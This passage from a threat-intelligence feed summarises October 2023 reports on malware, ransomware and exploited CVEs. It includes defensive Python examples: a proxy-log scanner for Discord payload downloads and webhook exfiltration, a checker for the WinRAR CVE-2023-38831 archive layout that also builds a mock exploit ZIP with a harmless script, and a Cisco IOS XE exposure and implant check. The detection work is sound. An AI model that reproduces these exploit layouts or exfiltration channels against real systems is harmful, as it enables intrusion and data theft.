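The two abuses described above (payload download from Discord's CDN, exfiltration through a webhook) are visible in proxy logs as long as the URL path is recorded. The scanner below is an added example, not Trellix's detection content: it parses a constructed proxy log format, recognises the attachment and webhook URL shapes, and labels each hit. The log format, the IP addresses, the snowflake IDs and the webhook token are all made up; the host names and path layouts are Discord's public ones.

```python
import re
from urllib.parse import urlparse

# Hosts Discord serves attachments and the HTTP API from.
CDN_HOSTS = {"cdn.discordapp.com", "media.discordapp.net"}
API_HOSTS = {"discord.com", "discordapp.com", "ptb.discord.com", "canary.discord.com"}

ATTACHMENT_PATH = re.compile(r"^/attachments/\d+/\d+/[^/]+$")
WEBHOOK_PATH = re.compile(r"^/api/(?:v\d+/)?webhooks/\d+/[A-Za-z0-9_\-]+$")
PAYLOAD_EXTS = (".exe", ".dll", ".msi", ".scr", ".zip", ".rar", ".ps1", ".bat", ".vbs", ".js")

# Constructed proxy log format: "<timestamp> <src_ip> <method> <url> <status>".
LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$")


def classify(method: str, url: str):
    """Map one request to a finding label, or None when it is not a Discord pattern of interest."""
    parts = urlparse(url)
    host = (parts.hostname or "").lower()
    path = parts.path
    if host in CDN_HOSTS and ATTACHMENT_PATH.match(path):
        # Attachment pulled from the CDN; an executable-looking name is the loader case.
        return "discord_cdn_payload" if path.lower().endswith(PAYLOAD_EXTS) else "discord_cdn_file"
    if host in API_HOSTS and WEBHOOK_PATH.match(path) and method.upper() == "POST":
        # Data pushed into a webhook: the exfiltration channel the report describes.
        return "discord_webhook_post"
    return None


def scan(lines):
    """Return (src_ip, label, url) for every log line matching a Discord abuse pattern."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue
        label = classify(m["method"], m["url"])
        if label:
            findings.append((m["src"], label, m["url"]))
    return findings


# Constructed log lines; IDs and token are invented and do not point at real Discord resources.
SAMPLE_LOG = """\
2023-10-21T09:14:02Z 10.0.5.17 GET https://cdn.discordapp.com/attachments/111111111111111111/222222222222222222/invoice.pdf.exe 200
2023-10-21T09:14:09Z 10.0.5.17 POST https://discord.com/api/webhooks/333333333333333333/AbCdEf_ghijk-LMNOP 204
2023-10-21T09:15:30Z 10.0.5.42 GET https://discord.com/channels/@me 200
2023-10-21T09:16:11Z 10.0.5.42 GET https://cdn.discordapp.com/attachments/444444444444444444/555555555555555555/team-photo.png 200
2023-10-21T09:17:00Z 10.0.5.17 GET https://updates.example.net/patch.exe 200
""".splitlines()


if __name__ == "__main__":
    for src, label, url in scan(SAMPLE_LOG):
        print(src, label, url)
```

`discord_cdn_file` is context rather than an alert, since many organisations use Discord legitimately; the higher-signal combinations are a webhook POST from a server or from a host with no Discord client, and a CDN payload download followed within seconds by a webhook POST from the same source, as in the first two sample lines. The check needs URL visibility (a TLS-inspecting proxy or endpoint telemetry); with DNS or SNI alone only the hosts are seen, not the paths.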
2023-10-21
RomCom_4_0_Targeted_Female_Politicians
LOW
+
Intel Source:
Anomali
Intel Name:
RomCom_4_0_Targeted_Female_Politicians
Date of Scan:
2023-10-21
Impact:
LOW
Summary:
This Anomali Cyber Watch roundup covers the US Health Sector Cybersecurity Coordination Center's report on the NoEscape ransomware, the ShellBot DDoS bot, and the Tropical Scorpius/Void Rabisu cyberespionage group. It recommends maintaining a comprehensive and tested backup solution, running the most current software version, and practicing defense-in-depth, and lists the MITRE ATT&CK techniques and tags associated with each threat.
Source: https://www.anomali.com/blog/anomali-cyber-watch-romcom-4-0-targeted-female-politicians-israeli-redalert-app-impersonated-and-more
2023-10-20
Fake_KeePass_Site_Leveraging_Google_Ads_and_Punycode_to_Spread_Malware
LOW
+
Intel Source:
Malwarebytes
Intel Name:
Fake_KeePass_Site_Leveraging_Google_Ads_and_Punycode_to_Spread_Malware
Date of Scan:
2023-10-20
Impact:
LOW
Summary:
Researchers at Malwarebytes discovered a highly deceptive malicious Google ad for the open-source password manager KeePass. They had already written about how tracking templates make brand impersonation easier, but this attack added another layer of deceit by using a Punycode-encoded domain that looks like the legitimate site.
Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/10/clever-malvertising-attack-uses-punycode-to-look-like-legitimate-website
2023-10-20
A_Novel_Low_Cost_Cybercrime_Tool_Is_Introduced
LOW
+
Intel Source:
Fortinet
Intel Name:
A_Novel_Low_Cost_Cybercrime_Tool_Is_Introduced
Date of Scan:
2023-10-20
Impact:
LOW
Summary:
Fortinet researchers found that ExelaStealer is essentially an open-source infostealer that the threat actor customizes for a fee. It is written in Python, though it uses resources from other languages (such as JavaScript) where necessary. It can steal sensitive data from a Windows host, including credit card numbers, passwords, cookies, and session data, and performs basic keylogging.
Source: https://www.fortinet.com/blog/threat-research/exelastealer-infostealer-enters-the-field
2023-10-20
A_New_Tactic_For_BlackCat_Ransomware
LOW
+
Intel Source:
Palo Alto
Intel Name:
A_New_Tactic_For_BlackCat_Ransomware
Date of Scan:
2023-10-20
Impact:
LOW
Summary:
Palo Alto Networks Unit 42 researchers have observed that the BlackCat/ALPHV ransomware operation has started using a new tool called "Munchkin," which uses a virtual machine to covertly deploy encryptors on network devices. Munchkin lets BlackCat operate on remote systems and encrypt network shares exposed over Common Internet File System (CIFS) or Server Message Block (SMB).
Source: https://unit42.paloaltonetworks.com/blackcat-ransomware-releases-new-utility-munchkin/#post-130681-_v8176g40kstn
2023-10-20
Italian_Clipper
LOW
+
Intel Source:
Cyble
Intel Name:
Italian_Clipper
Date of Scan:
2023-10-20
Impact:
LOW
Summary:
CRIL recently uncovered a phishing campaign by a threat actor targeting Italian-speaking users. The campaign employed droppers, obfuscators, crypters, fileless techniques, cryptocurrency address theft, and exfiltration via Discord. The malware, Pure Clipper, steals or manipulates cryptocurrency-related data such as wallet addresses. The threat actor used a .NET dropper protected by SmartAssembly that bundled a legitimate Tor installer and a PureCrypter binary. The clipper communicates with the attacker's Command and Control (C&C) through Discord, and persistence is achieved through Registry manipulation and Task Scheduler entries.
Source: https://cyble.com/blog/fileless-pure-clipper-malware-italian-users-in-the-crosshairs/
2023-10-20
An_Analysis_of_Malware_as_a_Service_on_the_Dark_web
LOW
+
Intel Source:
vmware
Intel Name:
An_Analysis_of_Malware_as_a_Service_on_the_Dark_web
Date of Scan:
2023-10-20
Impact:
LOW
Summary:
LummaStealer is a Malware-as-a-Service (MaaS) available on the dark web that has been observed evolving from underground platforms to more public hacker forums. This article explores the history of LummaStealer and its attack vectors, including the distribution of the malware through deceptive sites, drive-by downloads, and masquerading as browser updates. It also discusses LummaStealer's dark web presence, multiple sellers, and Russian origin.
Source: https://blogs.vmware.com/security/2023/10/an-ilummanation-on-lummastealer.html
2023-10-20
DarkGate_malware_infection_attempts
LOW
+
Intel Source:
withsecure
Intel Name:
DarkGate_malware_infection_attempts
Date of Scan:
2023-10-20
Impact:
LOW
Summary:
This article discusses the DarkGate malware campaign, which is related to the Ducktail campaigns and is conducted by Vietnamese cybercrime groups. It focuses on the use of multiple different MaaS infostealers and RATs to target the digital marketing sector, with the primary goal of hijacking Facebook business accounts. It provides details on the detection of the DarkGate malware infection attempts, the lures and delivery methods used, and the use of MSI Wrapper to wrap executable files in MSI bundles.
Source: https://labs.withsecure.com/publications/darkgate-malware-campaign
2023-10-19
Updated_MATA_Targeting_Eastern_European_Industrial_Firms
MEDIUM
+
Intel Source:
Kaspersky
Intel Name:
Updated_MATA_Targeting_Eastern_European_Industrial_Firms
Date of Scan:
2023-10-19
Impact:
MEDIUM
Summary:
The attackers targeted a number of victims with spear-phishing emails; some victims downloaded files using a browser and were infected with Windows executable malware. Every phishing document contained a link to an external page that loads a remote page exploiting CVE-2021-26411. The attackers continued sending infected documents by email through September 2022. The campaign ran for a total of six months, ending in May 2023.
Source: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/10/18092216/Updated-MATA-attacks-Eastern-Europe_full-report_ENG.pdf
2023-10-19
Hackers_Using_Google_Ads_to_Distribute_Weaponized_Notepad
LOW
+
Intel Source:
Malwarebytes
Intel Name:
Hackers_Using_Google_Ads_to_Distribute_Weaponized_Notepad
Date of Scan:
2023-10-19
Impact:
LOW
Summary:
Cybercriminals are using deceptive advertising to target users of Notepad++, the popular Windows text editor, which can result in malware and ransomware infections. According to Malwarebytes, the campaign appears to have escaped detection entirely for at least several months. What makes it notable is its ability to fingerprint visitors and deliver time-sensitive payloads.
Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/10/the-forgotten-malvertising-campaign
2023-10-19
Hackers_From_North_Korea_Exploiting_TeamCity_Vulnerability
MEDIUM
+
Intel Source:
Microsoft
Intel Name:
Hackers_From_North_Korea_Exploiting_TeamCity_Vulnerability
Date of Scan:
2023-10-19
Impact:
MEDIUM
Summary:
Researchers at Microsoft have discovered that two nation-state threat actors from North Korea, known as Diamond Sleet and Onyx Sleet, are taking advantage of CVE-2023-42793, a remote-code execution vulnerability that affects several JetBrains TeamCity server versions. Organizations utilize TeamCity, a continuous integration/continuous deployment (CI/CD) platform, for DevOps and other software development tasks.
Source: https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/
2023-10-19
The_new_threat_to_B2B
LOW
+
Intel Source:
Securelist
Intel Name:
The_new_threat_to_B2B
Date of Scan:
2023-10-19
Impact:
LOW
Summary:
Securelist describes a campaign that, since May 2023, has targeted over 200 users worldwide, most frequently in Russia, Saudi Arabia, Vietnam, Brazil, and Romania. The malicious executable IntelSvc.exe can execute commands, create folders, and store configuration files and logs. The money-making scripts use infected devices to mine Monero cryptocurrency, run a keylogger to capture keystrokes, and install a backdoor that sends requests to the C2 server. The conclusion stresses the importance of strong security in the B2B sector, as cybercriminals are constantly looking for resources to exploit for financial gain.
Source: https://securelist.com/miner-keylogger-backdoor-attack-b2b/110761/
2023-10-19
Qubitstrike_Targeting_Jupyter_Notebooks
LOW
+
Intel Source:
Cado Security
Intel Name:
Qubitstrike_Targeting_Jupyter_Notebooks
Date of Scan:
2023-10-19
Impact:
LOW
Summary:
A threat actor linked to a recent campaign targeting unprotected Jupyter Notebooks is likely based in Tunisia. The campaign aims to compromise cloud infrastructure and mine cryptocurrency. The Qubitstrike campaign's payloads are all hosted on codeberg.org, an alternative Git hosting service that offers many of the same features as GitHub.
Source: https://www.cadosecurity.com/qubitstrike-an-emerging-malware-campaign-targeting-jupyter-notebooks/
2023-10-19
BbyStealer_malware_campaign_resurfaces
LOW
+
Intel Source:
Cyble
Intel Name:
BbyStealer_malware_campaign_resurfaces
Date of Scan:
2023-10-19
Impact:
LOW
Summary:
Cyble researchers have discovered malware that uses multiple phishing domains to target users downloading Virtual Private Network (VPN) applications for Windows. In this campaign, the downloaded VPN application delivers an information-stealing malware known as "BbyStealer."
Source: https://cyble.com/blog/bbystealer-malware-resurfaces-sets-sights-on-vpn-users/
2023-10-19
State_Actors_Targeting_WinRAR_Flaw_In_Multiple_Campaigns
MEDIUM
+
Intel Source:
Google Blog
Intel Name:
State_Actors_Targeting_WinRAR_Flaw_In_Multiple_Campaigns
Date of Scan:
2023-10-19
Impact:
MEDIUM
Summary:
Google's Threat Analysis Group (TAG) has observed numerous government-backed hacking groups exploiting CVE-2023-38831, a known vulnerability in WinRAR, the popular file archiver for Windows. Cybercrime groups began exploiting the flaw in early 2023, while it was still unknown to defenders. Although a patch is now available, many users appear to remain at risk. TAG has seen government-backed actors from several countries exploiting the WinRAR vulnerability in their operations.
Source: https://blog.google/threat-analysis-group/government-backed-actors-exploiting-winrar-vulnerability/
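CVE-2023-38831, exploited in both the APT28 campaign above (CERT-FR entry) and the TAG entry here, has a recognisable archive layout: a benign-looking decoy file at the root (typically with a trailing space in its name) and a folder with the same name containing a script named after the decoy. Opening the decoy in a vulnerable WinRAR also runs the script. The checker below is an added example, not TAG's or WinRAR's code: it opens a ZIP in memory and reports root-file/folder name collisions where the folder holds a script-like file, and builds constructed malicious and benign archives to run against. The file names, the extension list and the script body are all constructed; the script body is a harmless echo.

```python
import io
import zipfile

# Extensions that run when handed to the shell (assumed list, covering the variants seen publicly).
SCRIPT_EXTS = (".cmd", ".bat", ".exe", ".vbs", ".js", ".ps1", ".scr", ".lnk", ".hta")


def suspicious_entries(archive_bytes: bytes):
    """Return (decoy, payload) pairs: a root-level file whose name (ignoring trailing
    whitespace) matches a folder that directly contains a script-like file."""
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        files = [n for n in zf.namelist() if not n.endswith("/")]
    # Index root-level files by their name with trailing whitespace removed,
    # because the lure name and the folder name usually differ only by that space.
    root_by_key = {}
    for name in files:
        if "/" not in name:
            root_by_key.setdefault(name.rstrip(), []).append(name)
    findings = []
    for name in files:
        top, sep, leaf = name.partition("/")
        if not sep or "/" in leaf:
            continue  # root entry, or nested deeper than the one-folder layout
        decoys = root_by_key.get(top.rstrip(), [])
        if decoys and leaf.rstrip().lower().endswith(SCRIPT_EXTS):
            for decoy in decoys:
                findings.append((decoy, name))
    return findings


def build_sample(malicious: bool) -> bytes:
    """Construct an in-memory ZIP: the CVE-2023-38831 layout, or a harmless archive for comparison."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        if malicious:
            zf.writestr("report.pdf ", b"%PDF-1.4\n%decoy\n")
            zf.writestr("report.pdf /report.pdf .cmd", b"@echo off\r\necho constructed harmless sample\r\n")
        else:
            zf.writestr("report.pdf", b"%PDF-1.4\n%real\n")
            zf.writestr("attachments/notes.txt", b"nothing to see\n")
    return buf.getvalue()


def scan_file(path: str):
    """Convenience wrapper for a ZIP on disk."""
    with open(path, "rb") as fh:
        return suspicious_entries(fh.read())


if __name__ == "__main__":
    for label, blob in (("malicious", build_sample(True)), ("benign", build_sample(False))):
        print(label, suspicious_entries(blob))
```

The standard library reads ZIP containers only; WinRAR opens ZIPs and most published samples were ZIPs, but RAR-format lures need the third-party `rarfile` module with the same logic. This is a mail-gateway or sandbox triage check, not a substitute for patching: the bug is fixed in WinRAR 6.23, and the trailing-space tell can be absent in other name-collision variants.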
2023-10-19
Ransomware_actor_attacks_unsupported_ColdFusion_servers
MEDIUM
+
Intel Source:
Sophos
Intel Name:
Ransomware_actor_attacks_unsupported_ColdFusion_servers
Date of Scan:
2023-10-19
Impact:
MEDIUM
Summary:
An unknown actor attempted to deploy ransomware on obsolete Adobe ColdFusion servers using leaked LockBit 3.0 source code. Sophos X-Ops blocked the attack with endpoint behavioral detections. The attacker left a directory listing of artifacts and hashes, which revealed the intended ransomware payload. The ransom note credited "BlackDog 2023" and demanded 205 Monero.
Source: https://news.sophos.com/en-us/2023/10/19/ransomware-actor-exploits-coldfusion-servers-but-comes-away-empty-handed/
2023-10-19
Crambus_Hackers_Targeting_Middle_Eastern_Government
MEDIUM
+
Intel Source:
Symantec
Intel Name:
Crambus_Hackers_Targeting_Middle_Eastern_Government
Date of Scan:
2023-10-19
Impact:
MEDIUM
Summary:
Between February and September 2023, the Iranian Crambus espionage group (also known as OilRig and APT34) conducted an eight-month intrusion against a government in the Middle East. In one instance, the attackers installed a PowerShell backdoor called PowerExchange, which monitors incoming emails on an Exchange server, executes commands the attackers send in the form of emails, and covertly forwards the results back to them. The attackers also stole files and passwords during the compromise. Malicious activity was seen on at least 12 machines, and there is evidence that the attackers installed backdoors and keyloggers on numerous additional computers.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/crambus-middle-east-government
2023-10-18
Analysis_of_Alleged_Hack_of_Israeli_Power_Station_Amid_Ongoing_Conflict
LOW
+
Intel Source:
Securelist
Intel Name:
Analysis_of_Alleged_Hack_of_Israeli_Power_Station_Amid_Ongoing_Conflict
Date of Scan:
2023-10-18
Impact:
LOW
Summary:
The Securelist report examines cyber activity associated with the Israel-Hamas conflict, including distributed denial-of-service (DDoS) attacks, information warfare, and hacktivism campaigns. It highlights a recent purported hack of the Dorad private power station by a group called Cyber Av3ngers. On analysis, however, the data presented by Cyber Av3ngers was found to come from an older breach by a separate hacktivist group known as Moses Staff. Moses Staff, allegedly an Iranian hacker group, primarily targets Israeli companies and other organizations globally.
Source: https://securelist.com/a-hack-in-hand-is-worth-two-in-the-bush/110794/
2023-10-18
A_New_Backdoor_Targeting_ASEAN_Organizations_And_Governments
MEDIUM
+
Intel Source:
Elastic
Intel Name:
A_New_Backdoor_Targeting_ASEAN_Organizations_And_Governments
Date of Scan:
2023-10-18
Impact:
MEDIUM
Summary:
The novel BLOODALCHEMY backdoor, part of the REF5961 intrusion set used by a China-linked threat operation, is being used to attack x86 systems belonging to governments and organizations in Association of Southeast Asian Nations (ASEAN) member states.
Source: https://www.elastic.co/security-labs/disclosing-the-bloodalchemy-backdoor
2023-10-18
Cisco_Discovers_Critical_Vulnerability_Exploitation_in_IOS_XE_Software
MEDIUM
+
Intel Source:
Cisco Talos
Intel Name:
Cisco_Discovers_Critical_Vulnerability_Exploitation_in_IOS_XE_Software
Date of Scan:
2023-10-18
Impact:
MEDIUM
Summary:
Cisco has detected active exploitation of a critical vulnerability (CVE-2023-20198) in the Web User Interface feature of Cisco IOS XE software, which can give attackers full control of affected devices. Suspicious activity was first observed on September 18, and an implant was deployed on October 12. Cisco advises immediate action to mitigate the threat, including disabling the HTTP Server feature on internet-facing systems.
Source: https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/
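Two things a practitioner wants from this entry are a way to find devices with the Web UI listener enabled and a way to check a device for the implant. The block below is an added example, not Cisco's or Talos's code: `http_server_exposure` parses `show running-config` text for the `ip http server` / `ip http secure-server` lines the exploit needs and `remediation_commands` emits the matching `no` forms; `implant_check_command` renders the curl request Talos published in its advisory, and `response_indicates_implant` applies the advisory's rule that a hexadecimal-string reply means the implant answered. The running-config excerpts and hostnames are constructed.

```python
import re

# The check Talos published with its advisory: an implanted device answers this POST with a hex string.
IMPLANT_CHECK_COMMAND = 'curl -k -X POST "https://{device}/webui/logoutconfirm.html?logon_hash=1"'


def implant_check_command(device: str) -> str:
    """Render the Talos curl one-liner for a device IP or hostname."""
    return IMPLANT_CHECK_COMMAND.format(device=device)


def response_indicates_implant(body: str) -> bool:
    """True when the response body is nothing but a hexadecimal string (the implant's reply).
    A normal Web UI returns HTML or an empty body, so anything else is negative."""
    body = body.strip()
    return bool(body) and re.fullmatch(r"[0-9A-Fa-f]+", body) is not None


def http_server_exposure(running_config: str) -> dict:
    """Parse 'show running-config' text for the Web UI settings CVE-2023-20198 depends on."""
    lines = [ln.strip() for ln in running_config.splitlines()]
    return {
        "http": "ip http server" in lines,
        "https": "ip http secure-server" in lines,
        # An access-class ACL narrows who can reach the listener but does not remove it.
        "access_class": any(ln.startswith("ip http access-class") for ln in lines),
    }


def remediation_commands(exposure: dict) -> list:
    """Config-mode commands that remove the exposed listener(s); empty when nothing is enabled."""
    cmds = []
    if exposure["http"]:
        cmds.append("no ip http server")
    if exposure["https"]:
        cmds.append("no ip http secure-server")
    return cmds


# Constructed running-config excerpts (hostnames invented).
CONFIG_EXPOSED = """\
!
hostname edge-rtr-01
!
ip http server
ip http secure-server
ip http authentication local
!
"""

CONFIG_HARDENED = """\
!
hostname edge-rtr-02
!
no ip http server
no ip http secure-server
!
"""


if __name__ == "__main__":
    for name, cfg in (("edge-rtr-01", CONFIG_EXPOSED), ("edge-rtr-02", CONFIG_HARDENED)):
        exp = http_server_exposure(cfg)
        print(name, exp, remediation_commands(exp))
    print(implant_check_command("192.0.2.10"))
    print(response_indicates_implant("0a1b2c3d4e5f60718293a4b5c6d7e8f9"),
          response_indicates_implant("<html><body>Logout</body></html>"))
```

A negative implant check is not proof of a clean device: the implant does not survive a reboot while the attacker's added accounts do, so also review local users and the other indicators in the Talos post, and treat any device that had the Web UI reachable from the internet during the exploitation window as potentially compromised until its configuration has been audited. Disabling the listener removes the attack surface; where the Web UI must stay up for internal management, restricting it with an access-class ACL is a reduction, not a fix, and the upgrade Cisco ships for CVE-2023-20198 still has to be applied.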
2023-10-18
Kimsuky_Threat_Group_Controls_Infected_Systems_Using_RDP
LOW
+
Intel Source:
ASEC
Intel Name:
Kimsuky_Threat_Group_Controls_Infected_Systems_Using_RDP
Date of Scan:
2023-10-18
Impact:
LOW
Summary:
Researchers from ASEC have been monitoring recent incidents in which the Kimsuky group allegedly used spear phishing to install BabyShark before deploying various RDP-related malware strains. The tools used in the attacks share characteristics with those seen in earlier incidents, but based on their PDB information they appear to have been built very recently for these attacks.
Source: https://asec.ahnlab.com/en/57873/
2023-10-18
Vulnerabilities_in_Milesight_Industrial_Cellular_Routers
LOW
Intel Source:
Vulncheck
Intel Name:
Vulnerabilities_in_Milesight_Industrial_Cellular_Routers
Date of Scan:
2023-10-18
Impact:
LOW
Summary:
A recent disclosure of CVE-2023-43261 highlights vulnerabilities in Milesight's industrial cellular routers, potentially exposing industrial control system (ICS) networks to the internet. This article explores how these routers are used in various critical infrastructure scenarios, the specifics of the vulnerability, and the extent of its impact in the wild. While the CVE description is misleading, we find that the actual number of vulnerable routers in the wild is relatively low. Nonetheless, some evidence suggests that exploitation is likely occurring, although not at a large scale.
Source: https://vulncheck.com/blog/real-world-cve-2023-43261
2023-10-18
XorDDoS_Trojan_Campaign
MEDIUM
Intel Source:
Paloaltonetworks
Intel Name:
XorDDoS_Trojan_Campaign
Date of Scan:
2023-10-18
Impact:
MEDIUM
Summary:
Palo Alto Networks researchers spotted a recent campaign involving the XorDDoS Trojan, in which attackers compromise Linux devices to carry out remote malicious activity. The report presents an in-depth investigation that reveals concealed command and control (C2) network infrastructure and shows a shift towards the use of legitimate public hosting services.
Source: https://unit42.paloaltonetworks.com/new-linux-xorddos-trojan-campaign-delivers-malware/
2023-10-18
A_Global_View_of_LATAM_Threats
LOW
Intel Source:
Welivesecurity
Intel Name:
A_Global_View_of_LATAM_Threats
Date of Scan:
2023-10-18
Impact:
LOW
Summary:
Researchers from ESET have discovered an increase in evasion techniques and high-value targets in threats affecting the LATAM region.
Source: https://www.welivesecurity.com/en/eset-research/operation-king-tut-universe-threats-latam/
2023-10-18
Grayling_new_threat_actor_targets_organizations_in_Taiwan
LOW
Intel Source:
Symantec
Intel Name:
Grayling_new_threat_actor_targets_organizations_in_Taiwan
Date of Scan:
2023-10-18
Impact:
LOW
Summary:
A newly observed advanced persistent threat group used custom malware and multiple publicly available tools to target a number of organizations in the manufacturing, IT, and biomedical sectors in Taiwan. The Symantec Threat Hunter Team attributed this activity to a new group it calls Grayling. The activity stood out because of Grayling's use of a distinctive DLL sideloading technique that relies on a custom decryptor to deploy payloads.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayling-taiwan-cyber-attacks
2023-10-17
Phishing_abuse_the_marketing_tool_Smart_Links
LOW
Intel Source:
Aitime.Space
Intel Name:
Phishing_abuse_the_marketing_tool_Smart_Links
Date of Scan:
2023-10-17
Impact:
LOW
Summary:
Aitime news reported on an attack, not the first of its kind, that abuses the Smart Links marketing tool. This time the threat actor went a step further and used the tool's URL to carry the recipient's email address into the link that points to the phishing website.
Source: https://news.aitime.space/2023/10/60837/
2023-10-17
Lumma_Stealers_Stealthy_Invasion
LOW
Intel Source:
Trend Micro
Intel Name:
Lumma_Stealers_Stealthy_Invasion
Date of Scan:
2023-10-17
Impact:
LOW
Summary:
Researchers at Trend Micro have found that cybercriminals are leveraging Discord, a chat platform popular among gamers and content creators, to distribute the information-stealing malware known as Lumma Stealer. Malicious actors abuse Discord's infrastructure to host and spread the malware while using the platform's API to create bots for remote control.
Source: https://www.trendmicro.com/en_us/research/23/j/beware-lumma-stealer-distributed-via-discord-cdn-.html
2023-10-17
Pro_Russian_Hackers_Exploiting_WinRAR_Vulnerability
MEDIUM
Intel Source:
Cluster25
Intel Name:
Pro_Russian_Hackers_Exploiting_WinRAR_Vulnerability
Date of Scan:
2023-10-17
Impact:
MEDIUM
Summary:
A newly discovered security flaw in the WinRAR archiving tool has been exploited by pro-Russian hacker groups as part of a phishing effort aimed at obtaining login credentials from compromised systems. The attack uses malicious archive files to take advantage of a recently identified vulnerability (CVE-2023-38831) that affects WinRAR versions older than 6.23.
Source: https://blog.cluster25.duskrise.com/2023/10/12/cve-2023-38831-russian-attack
2023-10-17
The_State_of_Current_Fake_Browser_Updates
LOW
Intel Source:
Proofpoint
Intel Name:
The_State_of_Current_Fake_Browser_Updates
Date of Scan:
2023-10-17
Impact:
LOW
Summary:
The numerous threat clusters that use fake browser update-related themes are being monitored by Proofpoint. False browser updates take advantage of consumers' confidence by using compromised websites and a bait that is specific to each user's browser to make the update appear legitimate and trick users into clicking.
Source: https://www.proofpoint.com/us/blog/threat-insight/are-you-sure-your-browser-date-current-landscape-fake-browser-updates
2023-10-17
Malicious_Impersonation_and_Data_Theft_attack_Targeting_RedAlert
LOW
Intel Source:
Cloudflare
Intel Name:
Malicious_Impersonation_and_Data_Theft_attack_Targeting_RedAlert
Date of Scan:
2023-10-17
Impact:
LOW
Summary:
Cloudflare's Cloudforce One Threat Operations Team discovered a malicious website impersonating the RedAlert - Rocket Alerts application, which provides crucial alerts about incoming airstrikes in Israel. This attack comes in the wake of recent cyber threats against rocket alert applications used in the region. The malicious website offered a fake Android version of the RedAlert app that, when downloaded, collected sensitive user data. We provide an analysis of the malicious APK's capabilities and the methods it uses to avoid detection.
Source: https://blog.cloudflare.com/malicious-redalert-rocket-alerts-application-targets-israeli-phone-calls-sms-and-user-information/
2023-10-17
Diving_Deep_into_MedusaLocker_Ransomware
LOW
Intel Source:
QuickHeal
Intel Name:
Diving_Deep_into_MedusaLocker_Ransomware
Date of Scan:
2023-10-17
Impact:
LOW
Summary:
Researchers at QuickHeal have examined and offered defense tactics against the ransomware known as MedusaLocker, which initially appeared in the middle of 2019. The hospital and healthcare sectors are its main targets. MedusaLocker encrypts the data of its victims using RSA and AES encryption methods.
Source: https://blogs.quickheal.com/medusalocker-ransomware-an-in-depth-technical-analysis-and-prevention-strategies/
2023-10-17
The_New_Frontier_of_Evasive_Attacks
LOW
Intel Source:
Trellix
Intel Name:
The_New_Frontier_of_Evasive_Attacks
Date of Scan:
2023-10-17
Impact:
LOW
Summary:
Malicious actors have escalated the use of QR codes in phishing campaigns to bypass email security products. The blog delves into two distinct attack campaigns, each utilizing QR codes for evasion. Campaign 1 targets Microsoft Account holders, employing QR codes in email bodies to trick victims. Campaign 2 capitalizes on Chinese Government subsidy claims with QR codes embedded directly in emails.
Source: https://www.trellix.com/en-us/about/newsroom/stories/research/peeling-off-qr-code-phishing-onion.html
2023-10-17
Examining_In_Depth_Dark_Angels_Ransomware
LOW
Intel Source:
SentinelOne
Intel Name:
Examining_In_Depth_Dark_Angels_Ransomware
Date of Scan:
2023-10-17
Impact:
LOW
Summary:
Researchers from SentinelOne have provided technical information about the Dark Angels ransomware, compared samples of RagnarLocker and Dark Angels, and offered advice for security teams protecting ESXi servers.
Source: https://www.sentinelone.com/blog/dark-angels-esxi-ransomware-borrows-code-victimology-from-ragnarlocker/
2023-10-17
Critical_Unauthenticated_Arbitrary_File_Upload_Vulnerability
LOW
Intel Source:
Wordfence
Intel Name:
Critical_Unauthenticated_Arbitrary_File_Upload_Vulnerability
Date of Scan:
2023-10-17
Impact:
LOW
Summary:
The Royal Elementor Addons and Templates WordPress plugin is used by over 200,000 websites. The Wordfence Threat Intelligence Team discovered a vulnerability in the plugin that was recently patched, allowing unauthenticated attackers to upload any file to a compromised website.
Source: https://www.wordfence.com/blog/2023/10/psa-critical-unauthenticated-arbitrary-file-upload-vulnerability-in-royal-elementor-addons-and-templates-being-actively-exploited/
2023-10-16
Domain_Name_Recorded_by_DShield_Sensor_as_Password
LOW
Intel Source:
ISC.SANS
Intel Name:
Domain_Name_Recorded_by_DShield_Sensor_as_Password
Date of Scan:
2023-10-16
Impact:
LOW
Summary:
SANS researchers noticed something unusual in the list of Top Usernames and Passwords: for the first time, multiple domain names were being used as passwords. At first they suspected a mistake in Logstash's processing, so they reviewed the raw logs to confirm that everything had been processed correctly and that the data was intact.
Source: https://isc.sans.edu/diary/Domain+Name+Used+as+Password+Captured+by+DShield+Sensor/30312/
2023-10-16
Exploit_of_Atlassian_Confluence_CVE_2023_22515
HIGH
Intel Source:
CISA
Intel Name:
Exploit_of_Atlassian_Confluence_CVE_2023_22515
Date of Scan:
2023-10-16
Impact:
HIGH
Summary:
Today, CISA, the FBI, and MS-ISAC published a joint Cybersecurity Advisory on the active exploitation of CVE-2023-22515. The vulnerability affects certain versions of Atlassian Confluence Data Center and Server and allows threat actors to gain initial access to Confluence instances by creating unauthorized Confluence administrator accounts. It was exploited as a zero-day to obtain access to victim systems and exploitation remains active. The vulnerability is rated critical, and the agencies expect widespread, continued exploitation because it is easy to exploit.
Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-289a
2023-10-16
Voice_Message_Phishing_Campaigns_Access_Key
LOW
Intel Source:
Cofense
Intel Name:
Voice_Message_Phishing_Campaigns_Access_Key
Date of Scan:
2023-10-16
Impact:
LOW
Summary:
Researchers at Cofense have seen a phishing effort in which the attackers used an access key in the body of the message to lure the victim into listening to the voicemail that had been left for them to review.
Source: https://cofense.com/blog/access-key-used-in-voice-messaged-phishing/
2023-10-16
EtherHiding_Malware_Campaign_Takes_Advantage_of_Binances_Smart_Chain
LOW
Intel Source:
Guard Labs
Intel Name:
EtherHiding_Malware_Campaign_Takes_Advantage_of_Binances_Smart_Chain
Date of Scan:
2023-10-16
Impact:
LOW
Summary:
Threat actors have been seen using Binance Smart Chain (BSC) contracts to deliver malware in what has been called the "next level of bulletproof hosting." Guardio Labs, which discovered the campaign two months ago, has named it EtherHiding.
